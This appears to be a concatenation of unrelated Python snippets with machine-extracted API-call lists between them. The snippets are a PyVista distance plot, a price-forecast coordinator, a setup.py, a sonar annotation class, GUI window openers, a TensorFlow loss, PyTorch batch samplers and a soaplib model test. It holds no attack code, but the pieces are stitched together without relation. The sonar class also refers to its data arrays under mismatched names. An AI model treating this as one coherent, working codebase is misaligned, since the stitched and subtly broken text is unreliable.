"paddle.fluid.CUDA... | [((1207, 1478), 'paddlehub.module.module.moduleinfo', 'moduleinfo', ([], {'name': '"""plato2_en_base"""', 'version': '"""1.0.0"""', 'summary': '"""A novel pre-training model for dialogue generation, incorporated with latent discrete variables for one-to-many relationship modeling."""', 'author': '"""baidu-nlp"""', 'author_email': '""""""', 'type': '"""nlp/text_generation"""'}), "(name='plato2_en_base', version='1.0.0', summary=\n 'A novel pre-training model for dialogue generation, incorporated with latent discrete variables for one-to-many relationship modeling.'\n , author='baidu-nlp', author_email='', type='nlp/text_generation')\n", (1217, 1478), False, 'from paddlehub.module.module import moduleinfo, serving\n'), ((1865, 1887), 'plato2_en_base.tasks.dialog_generation.DialogGeneration', 'DialogGeneration', (['args'], {}), '(args)\n', (1881, 1887), False, 'from plato2_en_base.tasks.dialog_generation import DialogGeneration\n'), ((1984, 2025), 'collections.namedtuple', 'namedtuple', (['"""Example"""', "['src', 'data_id']"], {}), "('Example', ['src', 'data_id'])\n", (1994, 2025), False, 'from collections import namedtuple\n'), ((2163, 2201), 'os.path.join', 'os.path.join', (['self.directory', '"""assets"""'], {}), "(self.directory, 'assets')\n", (2175, 2201), False, 'import os\n'), ((2223, 2261), 'os.path.join', 'os.path.join', (['assets_path', '"""vocab.txt"""'], {}), "(assets_path, 'vocab.txt')\n", (2235, 2261), False, 'import os\n'), ((2296, 2337), 'os.path.join', 'os.path.join', (['assets_path', '"""24L"""', '"""Plato"""'], {}), "(assets_path, '24L', 'Plato')\n", (2308, 2337), False, 'import os\n'), ((2363, 2401), 'os.path.join', 'os.path.join', (['assets_path', '"""spm.model"""'], {}), "(assets_path, 'spm.model')\n", (2375, 2401), False, 'import os\n'), ((2437, 2476), 'os.path.join', 'os.path.join', (['assets_path', '"""24L"""', '"""NSP"""'], {}), "(assets_path, '24L', 'NSP')\n", (2449, 2476), False, 'import os\n'), ((2499, 2536), 
'os.path.join', 'os.path.join', (['assets_path', '"""24L.json"""'], {}), "(assets_path, '24L.json')\n", (2511, 2536), False, 'import os\n'), ((3165, 3190), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (3188, 3190), False, 'import argparse\n'), ((3199, 3236), 'plato2_en_base.models.add_cmdline_args', 'plato_models.add_cmdline_args', (['parser'], {}), '(parser)\n', (3228, 3236), True, 'import plato2_en_base.models as plato_models\n'), ((3245, 3286), 'plato2_en_base.tasks.dialog_generation.DialogGeneration.add_cmdline_args', 'DialogGeneration.add_cmdline_args', (['parser'], {}), '(parser)\n', (3278, 3286), False, 'from plato2_en_base.tasks.dialog_generation import DialogGeneration\n'), ((3302, 3320), 'plato2_en_base.utils.args.parse_args', 'parse_args', (['parser'], {}), '(parser)\n', (3312, 3320), False, 'from plato2_en_base.utils.args import parse_args\n'), ((5635, 5773), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': "('Run the %s module.' % self.name)", 'prog': "('hub run %s' % self.name)", 'usage': '"""%(prog)s"""', 'add_help': '(True)'}), "(description='Run the %s module.' % self.name, prog=\n 'hub run %s' % self.name, usage='%(prog)s', add_help=True)\n", (5658, 5773), False, 'import argparse\n'), ((1941, 1959), 'paddle.fluid.CUDAPlace', 'fluid.CUDAPlace', (['(0)'], {}), '(0)\n', (1956, 1959), True, 'import paddle.fluid as fluid\n')] |
# Compute the distance between all the points on a sphere and a
# plane.
#
import pyvista as pv
sphere = pv.Sphere()
plane = pv.Plane()
# inplace=True stores the result on the sphere mesh itself, under the
# 'implicit_distance' point-data key (presumably a signed distance --
# confirm against the PyVista compute_implicit_distance docs).
_ = sphere.compute_implicit_distance(plane, inplace=True)
dist = sphere['implicit_distance']
type(dist)
# Expected:
## <class 'numpy.ndarray'>
#
# Plot these distances as a heatmap
#
pl = pv.Plotter()
# 'bwr' is a diverging colormap, suited to values spread around zero.
_ = pl.add_mesh(sphere, scalars='implicit_distance', cmap='bwr')
_ = pl.add_mesh(plane, color='w', style='wireframe')
pl.show()
#
# See :ref:`clip_with_surface_example` and
# :ref:`voxelize_surface_mesh_example` for more examples using
| [
"pyvista.Plane",
"pyvista.Plotter",
"pyvista.Sphere"
] | [((105, 116), 'pyvista.Sphere', 'pv.Sphere', ([], {}), '()\n', (114, 116), True, 'import pyvista as pv\n'), ((125, 135), 'pyvista.Plane', 'pv.Plane', ([], {}), '()\n', (133, 135), True, 'import pyvista as pv\n'), ((324, 336), 'pyvista.Plotter', 'pv.Plotter', ([], {}), '()\n', (334, 336), True, 'import pyvista as pv\n')] |
# -*- coding: utf-8 -*-
# 系统模块
import sys
# 数据处理模块
import pandas as pd
# 引入外部模块
# 整理数据
from predict_prepare import Predict_Prepare as Prepare
# 获取价格预测结果
from predict_predict import Predict_Predict as Predict
class Predict_Lead:
    """Coordinates data preparation (Prepare) and price prediction
    (Predict) over the two forecast periods and merges the results."""

    def __init__(self):
        pass

    # Entry point called by other packages.
    def predict_result(self):
        """Run the two-stage forecast.

        Returns:
            combined: DataFrame of hog and corn price forecasts for both
                periods, re-indexed from 0.
            last_date1: time of the last hog-price record used by the
                first period's model.
            hog_compare1 / corn_compare1: training-result vs. actual-price
                comparison sets for the first period's hog and corn models.
        """
        preparer = Prepare()
        predictor = Predict()

        def run_period(period):
            # variables_prepar returns, per period: the hog model's
            # history/prediction variable sets and last record date, then
            # the same three items for the corn model.
            (hog_hist, hog_pred, hog_last,
             corn_hist, corn_pred, corn_last) = preparer.variables_prepar(period)
            forecast, hog_compare, corn_compare = predictor.predict_result(
                hog_hist, hog_last, hog_pred,
                corn_hist, corn_last, corn_pred, period)
            return forecast, hog_last, hog_compare, corn_compare

        # First forecast period.
        forecast1, last_date1, hog_compare1, corn_compare1 = run_period(1)
        # Second forecast period (its comparison sets are discarded).
        forecast2, _, _, _ = run_period(2)

        # Stitch the two forecast windows together.
        combined = pd.concat([forecast1, forecast2]).reset_index(drop=True)
        return combined, last_date1, hog_compare1, corn_compare1
| [
"predict_predict.Predict_Predict",
"predict_prepare.Predict_Prepare",
"pandas.concat"
] | [((408, 417), 'predict_prepare.Predict_Prepare', 'Prepare', ([], {}), '()\n', (415, 417), True, 'from predict_prepare import Predict_Prepare as Prepare\n'), ((441, 450), 'predict_predict.Predict_Predict', 'Predict', ([], {}), '()\n', (448, 450), True, 'from predict_predict import Predict_Predict as Predict\n'), ((1752, 1797), 'pandas.concat', 'pd.concat', (['[predict_result1, predict_result2]'], {}), '([predict_result1, predict_result2])\n', (1761, 1797), True, 'import pandas as pd\n')] |
from distutils.core import setup
# Package metadata, factored out so the version and repo URL each appear
# only once.
_VERSION = '0.0.2'
_REPO_URL = 'https://github.com/ruivieira/python-als'

setup(
    name='als',
    packages=['als'],
    version=_VERSION,
    description='Python library for Alternating Least Squares (ALS)',
    author='<NAME>',
    author_email='<EMAIL>',
    url=_REPO_URL,
    download_url=_REPO_URL + '/archive/' + _VERSION + '.tar.gz',
    keywords=['als', 'recommendation', 'scientific', 'machine-learning', 'models'],
    classifiers=[],
)
| [
"distutils.core.setup"
] | [((34, 439), 'distutils.core.setup', 'setup', ([], {'name': '"""als"""', 'packages': "['als']", 'version': '"""0.0.2"""', 'description': '"""Python library for Alternating Least Squares (ALS)"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/ruivieira/python-als"""', 'download_url': '"""https://github.com/ruivieira/python-als/archive/0.0.2.tar.gz"""', 'keywords': "['als', 'recommendation', 'scientific', 'machine-learning', 'models']", 'classifiers': '[]'}), "(name='als', packages=['als'], version='0.0.2', description=\n 'Python library for Alternating Least Squares (ALS)', author='<NAME>',\n author_email='<EMAIL>', url='https://github.com/ruivieira/python-als',\n download_url=\n 'https://github.com/ruivieira/python-als/archive/0.0.2.tar.gz',\n keywords=['als', 'recommendation', 'scientific', 'machine-learning',\n 'models'], classifiers=[])\n", (39, 439), False, 'from distutils.core import setup\n')] |
# coding=utf-8
# National Oceanic and Atmospheric Administration (NOAA)
# Alaskan Fisheries Science Center (AFSC)
# Resource Assessment and Conservation Engineering (RACE)
# Midwater Assessment and Conservation Engineering (MACE)
# THIS SOFTWARE AND ITS DOCUMENTATION ARE CONSIDERED TO BE IN THE PUBLIC DOMAIN
# AND THUS ARE AVAILABLE FOR UNRESTRICTED PUBLIC USE. THEY ARE FURNISHED "AS IS."
# THE AUTHORS, THE UNITED STATES GOVERNMENT, ITS INSTRUMENTALITIES, OFFICERS,
# EMPLOYEES, AND AGENTS MAKE NO WARRANTY, EXPRESS OR IMPLIED, AS TO THE USEFULNESS
# OF THE SOFTWARE AND DOCUMENTATION FOR ANY PURPOSE. THEY ASSUME NO RESPONSIBILITY
# (1) FOR THE USE OF THE SOFTWARE AND DOCUMENTATION; OR (2) TO PROVIDE TECHNICAL
# SUPPORT TO USERS.
"""
| Developed by: <NAME> <<EMAIL>>
| National Oceanic and Atmospheric Administration (NOAA)
| Alaska Fisheries Science Center (AFSC)
| Midwater Assesment and Conservation Engineering Group (MACE)
|
| Author:
| <NAME> <<EMAIL>>
| Maintained by:
| <NAME> <<EMAIL>>
"""
import numpy as np
class bottom_data(object):
    '''
    The bottom_data class stores data from TAG0 (annotation) datagrams in
    Simrad raw files. It may be useful if other sonar file types have a
    similar annotation.
    '''

    # Number of elements the storage arrays grow by each time they fill.
    CHUNK_SIZE = 500

    def __init__(self, channel_id):
        # Counter tracking how many datagrams have been added.
        self.n_datagrams = 0
        # The channel this annotation data belongs to.
        self.channel_id = channel_id
        # Pre-allocate arrays for annotation times and text. (Named
        # annotation_times/annotation_text consistently -- the original
        # __init__ created "times" while every method used
        # "annotation_times", raising AttributeError.)
        self.annotation_times = np.empty(bottom_data.CHUNK_SIZE, dtype='datetime64[ms]')
        self.annotation_text = np.empty(bottom_data.CHUNK_SIZE, dtype=object)

    def add_datagram(self, time, annotation_datagram):
        """
        Add annotation text.

        Args:
            time: unused; kept for interface compatibility with the other
                *_data classes' add_datagram methods.
            annotation_datagram (dict): datagram dict returned by the
                simrad datagram parser; must provide the keys 'timestamp'
                and 'text'.
        """
        # Grow the arrays when full. (Fixes the original reference to the
        # undefined name annotation_data.CHUNK_SIZE.)
        if self.n_datagrams == self.annotation_times.shape[0]:
            self._resize_arrays(self.annotation_times.shape[0] +
                    bottom_data.CHUNK_SIZE)
        # Add this datagram to our data arrays.
        self.annotation_times[self.n_datagrams] = annotation_datagram['timestamp']
        self.annotation_text[self.n_datagrams] = annotation_datagram['text']
        # Increment datagram counter.
        self.n_datagrams += 1

    def interpolate(self, p_data, data_type, start_time=None, end_time=None):
        """
        Interpolate stored attribute data onto the ping times in p_data.

        NOTE(review): this method appears to have been copied from a
        motion-data class -- annotation data stores no 'pitch'/'roll'/
        'heave'/'heading' arrays, so every requested attribute currently
        interpolates to None. Kept for interface compatibility.

        Args:
            p_data: ping_data object providing the ping_time vector.
            data_type (str | list | None): attribute name(s) to
                interpolate; None selects all motion attributes.
            start_time / end_time: optional datetime64 bounds.

        Returns:
            (attributes, out_data) where out_data maps each attribute name
            to its interpolated array or None. An empty dict is returned
            when no datagrams are stored (note the differing return type,
            preserved from the original).
        """
        out_data = {}
        # Return an empty dict if we don't contain any data.
        if self.n_datagrams < 1:
            return out_data
        # Indices of the datagrams inside the requested time span.
        return_idxs = self.get_indices(start_time=start_time, end_time=end_time)
        if data_type is None:
            attributes = ['heave', 'pitch', 'roll', 'heading']
        elif isinstance(data_type, str):
            attributes = [data_type]
        else:
            # Accept any iterable of attribute names. (The original code
            # left `attributes` undefined for non-str, non-None input,
            # raising NameError.)
            attributes = list(data_type)
        for attribute in attributes:
            try:
                # Interpolate this attribute using the time vector of the
                # provided ping_data object.
                i_data = np.interp(p_data.ping_time.astype('d'),
                        self.annotation_times[:self.n_datagrams].astype('d'),
                        getattr(self, attribute), left=np.nan, right=np.nan)
                out_data[attribute] = i_data[return_idxs]
            except Exception:
                # Attribute doesn't exist (or is not numeric).
                out_data[attribute] = None
        return (attributes, out_data)

    def get_indices(self, start_time=None, end_time=None, time_order=True):
        """
        Return the indices of the datagrams inside the given time range.

        Args:
            start_time: datetime64 lower bound (None => earliest time).
            end_time: datetime64 upper bound (None => latest time).
            time_order (bool): if True, indices are returned in time order.

        Returns:
            Integer index array into the annotation arrays.
        """
        # Nothing stored yet: nothing to index.
        if self.n_datagrams < 1:
            return np.empty(0, dtype=int)
        # Only the filled portion of the time array is valid data.
        times = self.annotation_times[:self.n_datagrams]
        # Ensure that we have times to work with.
        if start_time is None:
            start_time = np.min(times)
        if end_time is None:
            end_time = np.max(times)
        # Sort time index if returning time ordered indexes.
        if time_order:
            primary_index = times.argsort()
        else:
            # Positional order. (The original code used the times
            # themselves as indices, which cannot work.)
            primary_index = np.arange(self.n_datagrams)
        # Determine which datagrams fall within the provided time span.
        mask = times[primary_index] >= start_time
        mask = np.logical_and(mask, times[primary_index] <= end_time)
        # Return the indices included in the specified range.
        return primary_index[mask]

    def _resize_arrays(self, new_size):
        """
        Resize the storage arrays to hold new_size elements.

        Called when the arrays are full and more data must be added, and
        by trim() to shrink them. (The original resized pitch/roll/heave/
        heading arrays left over from a motion-data class, which do not
        exist here.)

        Args:
            new_size (int): new length for the 1-d storage arrays.
        """
        self.annotation_times = np.resize(self.annotation_times, new_size)
        self.annotation_text = np.resize(self.annotation_text, new_size)

    def trim(self):
        """
        Trim arrays to their filled size after all data are added.

        Call once adding data is finished; removes the unused tail of the
        pre-allocated arrays.
        """
        self._resize_arrays(self.n_datagrams)

    def __str__(self):
        """
        Return a short human-readable summary of this bottom_data object.
        """
        # Print the class and address.
        msg = str(self.__class__) + " at " + str(hex(id(self))) + "\n"
        if self.n_datagrams > 0:
            msg = "{0} annotation data start time: {1}\n".format(msg, self.annotation_times[0])
            msg = "{0} annotation data end time: {1}\n".format(msg, self.annotation_times[self.n_datagrams - 1])
            # n_datagrams already counts the datagrams; the original
            # reported n_datagrams + 1 (off by one).
            msg = "{0} Number of datagrams: {1}\n".format(msg, self.n_datagrams)
        else:
            msg = msg + " bottom_data object contains no data\n"
        return msg
| [
"numpy.logical_and",
"numpy.max",
"numpy.resize",
"numpy.empty",
"numpy.min"
] | [((1558, 1614), 'numpy.empty', 'np.empty', (['bottom_data.CHUNK_SIZE'], {'dtype': '"""datetime64[ms]"""'}), "(bottom_data.CHUNK_SIZE, dtype='datetime64[ms]')\n", (1566, 1614), True, 'import numpy as np\n'), ((1646, 1692), 'numpy.empty', 'np.empty', (['bottom_data.CHUNK_SIZE'], {'dtype': 'object'}), '(bottom_data.CHUNK_SIZE, dtype=object)\n', (1654, 1692), True, 'import numpy as np\n'), ((6366, 6424), 'numpy.logical_and', 'np.logical_and', (['mask', '(self.time[primary_index] <= end_time)'], {}), '(mask, self.time[primary_index] <= end_time)\n', (6380, 6424), True, 'import numpy as np\n'), ((6953, 6983), 'numpy.resize', 'np.resize', (['self.time', 'new_size'], {}), '(self.time, new_size)\n', (6962, 6983), True, 'import numpy as np\n'), ((7006, 7037), 'numpy.resize', 'np.resize', (['self.pitch', 'new_size'], {}), '(self.pitch, new_size)\n', (7015, 7037), True, 'import numpy as np\n'), ((7059, 7089), 'numpy.resize', 'np.resize', (['self.roll', 'new_size'], {}), '(self.roll, new_size)\n', (7068, 7089), True, 'import numpy as np\n'), ((7114, 7147), 'numpy.resize', 'np.resize', (['self.heading', 'new_size'], {}), '(self.heading, new_size)\n', (7123, 7147), True, 'import numpy as np\n'), ((7170, 7201), 'numpy.resize', 'np.resize', (['self.heave', 'new_size'], {}), '(self.heave, new_size)\n', (7179, 7201), True, 'import numpy as np\n'), ((5928, 5945), 'numpy.min', 'np.min', (['self.time'], {}), '(self.time)\n', (5934, 5945), True, 'import numpy as np\n'), ((5998, 6015), 'numpy.max', 'np.max', (['self.time'], {}), '(self.time)\n', (6004, 6015), True, 'import numpy as np\n')] |
from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp
from View.Painel import painelSensores, painelControladores, painelConexao
from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit
# Abre as telas da aba de seleção
# Open the windows of the selection tab
def AbreTelaNovoProjeto(tela):
    """Open the 'new project' window."""
    telaNovoProjeto.TelaNovoProjeto(tela)
def AbreTelaAbrirProjeto(tela):
    """Open the 'open project' window."""
    telaAbrirProjeto.TelaAbrirProjeto(tela)
def AbreTelaRelatorio(tela):
    """Open the report window."""
    telaRelatorio.TelaRelatorio(tela)
def AbreTelaCadastro(tela):
    """Open the registration window."""
    telaCadastro.TelaCadastro(tela)
def AbreTelaConfigura(tela):
    """Open the configuration window."""
    telaConfigura.TelaConfigura(tela)
def AbreTelaConexao(tela):
    """Open the connection window."""
    telaConexao.TelaConexao(tela)
# Open the actuator-connection windows
def AbreTelaConAnAn(tela):
    """Open the analog-to-analog connection window."""
    telaConAnalogAnalog.TelaConAnalogAnalog(tela)
def AbreTelaConAnDig(tela):
    """Open the analog-to-digital connection window."""
    telaConAnalogDigit.TelaConAnalogDig(tela)
def AbreTelaConDigAn(tela):
    """Open the digital-to-analog connection window."""
    telaConDigitAnalog.TelaConDigAnalog(tela)
def AbreTelaConDigDig(tela):
    """Open the digital-to-digital connection window."""
    telaConDigitDigit.TelaConDigDig(tela)
# Open the frames for the tabs
def AbreFrameSensores(frame):
    """Build the sensors panel inside the given frame."""
    painelSensores.PainelSensores(frame)
def AbreFrameControladores(frame, tela):
    """Build the controllers panel inside the given frame."""
    painelControladores.PainelControladores(frame, tela)
def AbreFrameConexao(frame, tela):
    """Build the connection panel inside the given frame."""
    painelConexao.PainelConexao(frame, tela)
# Open the connection and controller editing windows
def AbreEditorControlador(tela, controle):
    """Open the editor window for the given controller."""
    telaEditarControle.TelaEditarControle(tela, controle)
# Open pop-up windows
def AbrePopUp(tela, mensagem):
    """Open a pop-up window showing the given message."""
    telaPopUp.TelaPopUp(tela, mensagem)
"View.telaPopUp.TelaPopUp",
"View.telaNovoProjeto.TelaNovoProjeto",
"View.telaAbrirProjeto.TelaAbrirProjeto",
"View.telaConexao.TelaConexao",
"View.Conexao.telaConDigitDigit.TelaConDigDig",
"View.Painel.painelSensores.PainelSensores",
"View.Conexao.telaConDigitAnalog.TelaConDigAnalog",
"View.Painel.pa... | [((391, 428), 'View.telaNovoProjeto.TelaNovoProjeto', 'telaNovoProjeto.TelaNovoProjeto', (['tela'], {}), '(tela)\n', (422, 428), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((473, 512), 'View.telaAbrirProjeto.TelaAbrirProjeto', 'telaAbrirProjeto.TelaAbrirProjeto', (['tela'], {}), '(tela)\n', (506, 512), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((549, 582), 'View.telaRelatorio.TelaRelatorio', 'telaRelatorio.TelaRelatorio', (['tela'], {}), '(tela)\n', (576, 582), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((617, 648), 'View.telaCadastro.TelaCadastro', 'telaCadastro.TelaCadastro', (['tela'], {}), '(tela)\n', (642, 648), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((685, 718), 'View.telaConfigura.TelaConfigura', 'telaConfigura.TelaConfigura', (['tela'], {}), '(tela)\n', (712, 718), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((753, 782), 'View.telaConexao.TelaConexao', 'telaConexao.TelaConexao', (['tela'], {}), '(tela)\n', (776, 782), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((855, 900), 'View.Conexao.telaConAnalogAnalog.TelaConAnalogAnalog', 'telaConAnalogAnalog.TelaConAnalogAnalog', (['tela'], {}), '(tela)\n', (894, 900), False, 'from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit\n'), ((936, 977), 'View.Conexao.telaConAnalogDigit.TelaConAnalogDig', 
'telaConAnalogDigit.TelaConAnalogDig', (['tela'], {}), '(tela)\n', (971, 977), False, 'from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit\n'), ((1012, 1053), 'View.Conexao.telaConDigitAnalog.TelaConDigAnalog', 'telaConDigitAnalog.TelaConDigAnalog', (['tela'], {}), '(tela)\n', (1047, 1053), False, 'from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit\n'), ((1089, 1126), 'View.Conexao.telaConDigitDigit.TelaConDigDig', 'telaConDigitDigit.TelaConDigDig', (['tela'], {}), '(tela)\n', (1120, 1126), False, 'from View.Conexao import telaConAnalogAnalog, telaConAnalogDigit, telaConDigitAnalog, telaConDigitDigit\n'), ((1193, 1229), 'View.Painel.painelSensores.PainelSensores', 'painelSensores.PainelSensores', (['frame'], {}), '(frame)\n', (1222, 1229), False, 'from View.Painel import painelSensores, painelControladores, painelConexao\n'), ((1278, 1330), 'View.Painel.painelControladores.PainelControladores', 'painelControladores.PainelControladores', (['frame', 'tela'], {}), '(frame, tela)\n', (1317, 1330), False, 'from View.Painel import painelSensores, painelControladores, painelConexao\n'), ((1373, 1413), 'View.Painel.painelConexao.PainelConexao', 'painelConexao.PainelConexao', (['frame', 'tela'], {}), '(frame, tela)\n', (1400, 1413), False, 'from View.Painel import painelSensores, painelControladores, painelConexao\n'), ((1519, 1572), 'View.telaEditarControle.TelaEditarControle', 'telaEditarControle.TelaEditarControle', (['tela', 'controle'], {}), '(tela, controle)\n', (1556, 1572), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, telaConexao, telaEditarControle, telaPopUp\n'), ((1636, 1671), 'View.telaPopUp.TelaPopUp', 'telaPopUp.TelaPopUp', (['tela', 'mensagem'], {}), '(tela, mensagem)\n', (1655, 1671), False, 'from View import telaRelatorio, telaNovoProjeto, telaAbrirProjeto, telaCadastro, telaConfigura, 
telaConexao, telaEditarControle, telaPopUp\n')] |
import tensorflow as tf
import numpy as np
a = np.arange(15)
out = a.reshape(5, 3)
c = np.arange(15) / 2
y_onehot = c.reshape(5, 3)
out_tensor = tf.convert_to_tensor(out, dtype=tf.float32)
y_onehot_tensor = tf.convert_to_tensor(y_onehot, dtype=tf.float32)
# y_onehot = tf.one_hot(y_onehot_tensor, depth=3) # one-hot编码
loss1 = tf.square(out_tensor - y_onehot_tensor)
loss2 = tf.reduce_sum(loss1) / 32
pass | [
"tensorflow.convert_to_tensor",
"tensorflow.reduce_sum",
"numpy.arange",
"tensorflow.square"
] | [((48, 61), 'numpy.arange', 'np.arange', (['(15)'], {}), '(15)\n', (57, 61), True, 'import numpy as np\n'), ((148, 191), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['out'], {'dtype': 'tf.float32'}), '(out, dtype=tf.float32)\n', (168, 191), True, 'import tensorflow as tf\n'), ((210, 258), 'tensorflow.convert_to_tensor', 'tf.convert_to_tensor', (['y_onehot'], {'dtype': 'tf.float32'}), '(y_onehot, dtype=tf.float32)\n', (230, 258), True, 'import tensorflow as tf\n'), ((331, 370), 'tensorflow.square', 'tf.square', (['(out_tensor - y_onehot_tensor)'], {}), '(out_tensor - y_onehot_tensor)\n', (340, 370), True, 'import tensorflow as tf\n'), ((89, 102), 'numpy.arange', 'np.arange', (['(15)'], {}), '(15)\n', (98, 102), True, 'import numpy as np\n'), ((379, 399), 'tensorflow.reduce_sum', 'tf.reduce_sum', (['loss1'], {}), '(loss1)\n', (392, 399), True, 'import tensorflow as tf\n')] |
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
#
# Author: <NAME> (<EMAIL>)
# Date: 05/15/2019
#
import os
import numpy as np
import math
import sys
from torch.utils.data import Sampler
__all__=['BatchSampler', 'DistributedBatchSampler', 'RandomSampler', 'SequentialSampler']
class BatchSampler(Sampler):
def __init__(self, sampler, batch_size):
self.sampler = sampler
self.batch_size = batch_size
def __iter__(self):
batch = []
for idx in self.sampler:
batch.append(idx)
if len(batch)==self.batch_size:
yield batch
batch = []
if len(batch)>0:
yield batch
def __len__(self):
return (len(self.sampler) + self.batch_size - 1)//self.batch_size
class DistributedBatchSampler(Sampler):
def __init__(self, sampler, rank=0, world_size = 1, drop_last = False):
self.sampler = sampler
self.rank = rank
self.world_size = world_size
self.drop_last = drop_last
def __iter__(self):
for b in self.sampler:
if len(b)%self.world_size != 0:
if self.drop_last:
break
else:
b.extend([b[0] for _ in range(self.world_size-len(b)%self.world_size)])
chunk_size = len(b)//self.world_size
yield b[self.rank*chunk_size:(self.rank+1)*chunk_size]
def __len__(self):
return len(self.sampler)
class RandomSampler(Sampler):
def __init__(self, total_samples:int, data_seed:int = 0):
self.indices = np.array(np.arange(total_samples))
self.rng = np.random.RandomState(data_seed)
def __iter__(self):
self.rng.shuffle(self.indices)
for i in self.indices:
yield i
def __len__(self):
return len(self.indices)
class SequentialSampler(Sampler):
def __init__(self, total_samples:int):
self.indices = np.array(np.arange(total_samples))
def __iter__(self):
for i in self.indices:
yield i
def __len__(self):
return len(self.indices)
| [
"numpy.random.RandomState",
"numpy.arange"
] | [((1557, 1589), 'numpy.random.RandomState', 'np.random.RandomState', (['data_seed'], {}), '(data_seed)\n', (1578, 1589), True, 'import numpy as np\n'), ((1516, 1540), 'numpy.arange', 'np.arange', (['total_samples'], {}), '(total_samples)\n', (1525, 1540), True, 'import numpy as np\n'), ((1844, 1868), 'numpy.arange', 'np.arange', (['total_samples'], {}), '(total_samples)\n', (1853, 1868), True, 'import numpy as np\n')] |
#!/usr/bin/env python
#
# soaplib - Copyright (C) Soaplib contributors.
#
# This library is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 2.1 of the License, or (at your option) any later version.
#
# This library is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this library; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301
#
import datetime
import unittest
from soaplib.core.model.clazz import ClassModel
from soaplib.core.model.clazz import Array
from soaplib.core.model.primitive import DateTime
from soaplib.core.model.primitive import Float
from soaplib.core.model.primitive import Integer
from soaplib.core.model.primitive import String
from lxml import etree
ns_test = 'test_namespace'
class Address(ClassModel):
street = String(min_occurs=1)
city = String(min_occurs=1)
zip = Integer(min_occurs=1)
since = DateTime(min_occurs=1)
lattitude = Float(min_occurs=1)
longitude = Float(min_occurs=1)
Address.resolve_namespace(Address,__name__)
class Person(ClassModel):
name = String
birthdate = DateTime
age = Integer
addresses = Array(Address)
titles = Array(String)
Person.resolve_namespace(Person,__name__)
class Employee(Person):
employee_id = Integer
salary = Float
Employee.resolve_namespace(Employee,__name__)
class Level2(ClassModel):
arg1 = String
arg2 = Float
Level2.resolve_namespace(Level2, __name__)
class Level3(ClassModel):
arg1 = Integer
Level3.resolve_namespace(Level3, __name__)
class Level4(ClassModel):
arg1 = String
Level4.resolve_namespace(Level4, __name__)
class Level1(ClassModel):
level2 = Level2
level3 = Array(Level3)
level4 = Array(Level4)
Level1.resolve_namespace(Level1, __name__)
class TestClassModel(unittest.TestCase):
def test_simple_class(self):
a = Address()
a.street = '123 happy way'
a.city = 'badtown'
a.zip = 32
a.lattitude = 4.3
a.longitude = 88.0
element = etree.Element('test')
Address.to_parent_element(a, ns_test, element)
element = element[0]
self.assertEquals(6, len(element.getchildren()))
r = Address.from_xml(element)
self.assertEquals(a.street, r.street)
self.assertEquals(a.city, r.city)
self.assertEquals(a.zip, r.zip)
self.assertEquals(a.lattitude, r.lattitude)
self.assertEquals(a.longitude, r.longitude)
self.assertEquals(a.since, r.since)
def test_nested_class(self): # FIXME: this test is incomplete
p = Person()
element = etree.Element('test')
Person.to_parent_element(p, ns_test, element)
element = element[0]
self.assertEquals(None, p.name)
self.assertEquals(None, p.birthdate)
self.assertEquals(None, p.age)
self.assertEquals(None, p.addresses)
def test_class_array(self):
peeps = []
names = ['bob', 'jim', 'peabody', 'mumblesleves']
for name in names:
a = Person()
a.name = name
a.birthdate = datetime.datetime(1979, 1, 1)
a.age = 27
peeps.append(a)
type = Array(Person)
type.resolve_namespace(type,__name__)
element = etree.Element('test')
type.to_parent_element(peeps, ns_test, element)
element = element[0]
self.assertEquals(4, len(element.getchildren()))
peeps2 = type.from_xml(element)
for i in range(0, 4):
self.assertEquals(peeps2[i].name, names[i])
self.assertEquals(peeps2[i].birthdate,
datetime.datetime(1979, 1, 1))
def test_class_nested_array(self):
peeps = []
names = ['bob', 'jim', 'peabody', 'mumblesleves']
for name in names:
a = Person()
a.name = name
a.birthdate = datetime.datetime(1979, 1, 1)
a.age = 27
a.addresses = []
for i in range(0, 25):
addr = Address()
addr.street = '555 downtown'
addr.city = 'funkytown'
a.addresses.append(addr)
peeps.append(a)
type = Array(Person)
type.resolve_namespace(type,__name__)
element = etree.Element('test')
type.to_parent_element(peeps, ns_test, element)
element = element[0]
self.assertEquals(4, len(element.getchildren()))
peeps2 = type.from_xml(element)
for peep in peeps2:
self.assertEquals(27, peep.age)
self.assertEquals(25, len(peep.addresses))
